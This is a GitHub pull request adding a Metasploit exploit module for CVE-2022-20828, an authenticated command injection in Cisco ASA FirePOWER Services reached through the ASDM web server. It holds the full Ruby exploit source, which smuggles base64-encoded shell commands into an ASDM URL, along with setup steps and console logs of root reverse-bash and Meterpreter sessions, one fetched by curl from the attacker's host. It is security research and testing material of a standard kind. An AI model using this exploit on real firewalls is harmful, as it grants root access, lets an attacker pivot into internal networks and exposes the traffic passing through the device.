### PR TITLE
Cisco ASA-X with FirePOWER Services Authenticated Command Injection (CVE-2022-20828)

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_asax_sfr_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_asax_sfr_rce.md
@@ -1,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability affecting
+Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+machine as the root user. Access to the virtual machine allows the attacker to
+pivot to the inside network, and access the outside network. Also, the SFR
+virtual machine is running snort on the traffic flowing through the ASA, so
+the attacker should have access to this diverted traffic as well.
+
+This module requires ASDM credentials in order to traverse the ASDM interface.
+A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+implemented here. This attack also assumes the module is installed and
+configured.
+
+Finally, it's worth noting that this attack bypasses the effects of the
+`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+available but this attack makes it available).
+
+Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+
+### Setup
+
+Cisco ASA that support the FirePOWER Services module are, to our knowledge,
+strictly hardware firewalls and not capable of being emulated. As such,
+testing requires a physical device. Once a device is acquired, you'll
+additionally need access to Cisco downloads of ASDM, ASA software, and the
+FirePOWER Services Software for ASA. Unfortunately, Cisco hides these
+behind a paywall (or a "contract" wall).
+
+However, if you do acquire a Cisco ASA that supports the FirePOWER Services
+module, then it will likely come with the module pre-installed. These systems
+do support downgrading of the module via uninstall and reinstallation. If
+you need to follow that course, then I found the following [guide](https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-configure-firepower-00.html#anc5) to be an excellent guide that
+demonstrates how to install the FirePOWER module from boot image through
+full installation.
+
+This particular module exploits the FirePOWER module via ASDM, so you'll need
+that installed and running as well. Likely, the ASA will have an ASDM binary
+package already installed, but if not you'll need to download that from Cisco
+and copy it onto the ASA. However, once that is complete, you can run the
+following commands to start ASDM and enable it on the inside/outside network.
+
+```
+asdm image disk0:/asdm<version>.bin
+http server enable
+http network mask inside
+http network mask outside
+```
+
+Where network and mask are who you want to be able to access it and inside
+is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should
+satisfy the pre-requisites for exploitation (ASDM+sfr).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/cisco_asax_sfr_rce`
+* Do: `set USERNAME <username>`
+* Do: `set PASSWORD <password>`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+### USERNAME
+
+The username to authenticate with the ASDM http web server with.
+
+### PASSWORD
+
+The password to authenticate with the ASDM http web server with.
+
+## Scenarios
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
+[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
+[*] Sending payload to 10.0.0.21 (curl/7.48.0)
+[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
+[*] Command Stager progress - 100.00% done (111/111 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 6315 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
+++ b/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => 'linux',
-              'Arch' => [ARCH_X64],
+              'Arch' => ARCH_X64,
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => [ 'curl', 'wget' ],
               'DefaultOptions' => {
@@ -81,7 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 1,
         'DefaultOptions' => {
           'RPORT' => 443,
-          'SSL' => true
+          'SSL' => true,
+          'MeterpreterTryToFork' => true
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -92,8 +93,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptString.new('USERNAME', [true, 'Username to authenticate with', 'cisco']),
-      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'labpass1']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),
     ])
   end
 
@@ -131,9 +132,21 @@ class MetasploitModule < Msf::Exploit::Remote
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       }
     })
-    return CheckCode::Unknown('The target did not respond to the check.') unless res
-    return CheckCode::Unknown('Authentication failed.') if res.code == 401
-    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+
+    if res
+      fail_with(Failure::Unreachable, 'The target did not respond.') unless res
+      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401
+      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+    end
+
+    if session_created?
+      # technically speaking, bash can hold the connection open and skip all the res checks
+      # also passing the res checks doesn't actually mean that the target was exploited so
+      # check a session was created to get verification
+      print_good('Session created!')
+    else
+      fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')
+    end
   end
 
   def exploit

--- a/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
+++ b/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
@@ -1,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability affecting
+          Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+          ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+          machine as the root user. Access to the virtual machine allows the attacker to
+          pivot to the inside network, and access the outside network. Also, the SFR
+          virtual machine is running snort on the traffic flowing through the ASA, so
+          the attacker should have access to this diverted traffic as well.
+
+          This module requires ASDM credentials in order to traverse the ASDM interface.
+          A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+          implemented here.
+
+          Finally, it's worth noting that this attack bypasses the affects of the
+          `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+          available but this attack makes it available).
+
+          Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+          support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+          and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+          versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+          receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-20828' ],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],
+          [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']
+        ],
+        'DisclosureDate' => '2022-06-22',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64,],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'cisco']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'labpass1']),
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),
+      'headers' =>
+      {
+        'User-Agent' => 'ASDM/ Java/1',
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+    return CheckCode::Unknown('The target did not respond to the check.') unless res
+    return CheckCode::Safe('Authentication failed.') if res.code == 401
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+
+    if res.body.include?('Invalid do command uid=0(root)')
+      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
+    end
+
+    CheckCode::Safe('The command injection does not appear to work.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    # base64 encode the payload to work around bad characters and then uri encode
+    # the whole thing before yeeting it at the server
+    encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),
+      'headers' =>
+      {
+        'User-Agent' => 'ASDM/ Java/1',
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+    return CheckCode::Unknown('The target did not respond to the check.') unless res
+    return CheckCode::Unknown('Authentication failed.') if res.code == 401
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end


### PR DESCRIPTION
This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's ASDM web server and lands in the FirePower Services SFR module's Linux virtual machine as the root user. Access to the virtual machine allows the attacker to pivot to the inside network, and access the outside network. Also, the SFR virtual machine is running snort on the traffic flowing through the ASA, so the attacker should have access to this diverted traffic as well.

This module requires ASDM credentials in order to traverse the ASDM interface. A similar attack can be performed via Cisco CLI (over SSH), although that isn't implemented here. This attack also assumes the module is installed and configured.

Finally, it's worth noting that this attack bypasses the effects of the `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be available but this attack makes it available).

Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service, and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will receive no patch: 6.2.2 and earlier, 6.3, 6.5, and 6.7.

## Verification

List the steps needed to make sure this thing works

- [ ] Acquire a test device and follow installation described (and linked) in setup details.
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/cisco_asax_sfr_rce`
- [ ] `set USERNAME <username>`
- [ ] `set PASSWORD <password>`
- [ ] `set RHOST <ip>`
- [ ] `set LHOST <ip>`
- [ ] `check`
- [ ] Verify the remote host is vulnerable.
- [ ] `run`
- [ ] Verify the module acquires a root shell

## Video || GTFO

https://www.youtube.com/watch?v=_4FEU4GDtB8

## PCAP || GTFO

The HTTPS interface doesn't downgrade to HTTP (to my knowledge). So, I pushed the exploit through `mitmproxy` and snagged the following pcap. This shows the exploits (check and payload) but doesn't show the reverse shell flowing back. I assume that's ok, but if not feel free to yell at me.

[output.zip](https://github.com/rapid7/metasploit-framework/files/9384892/output.zip)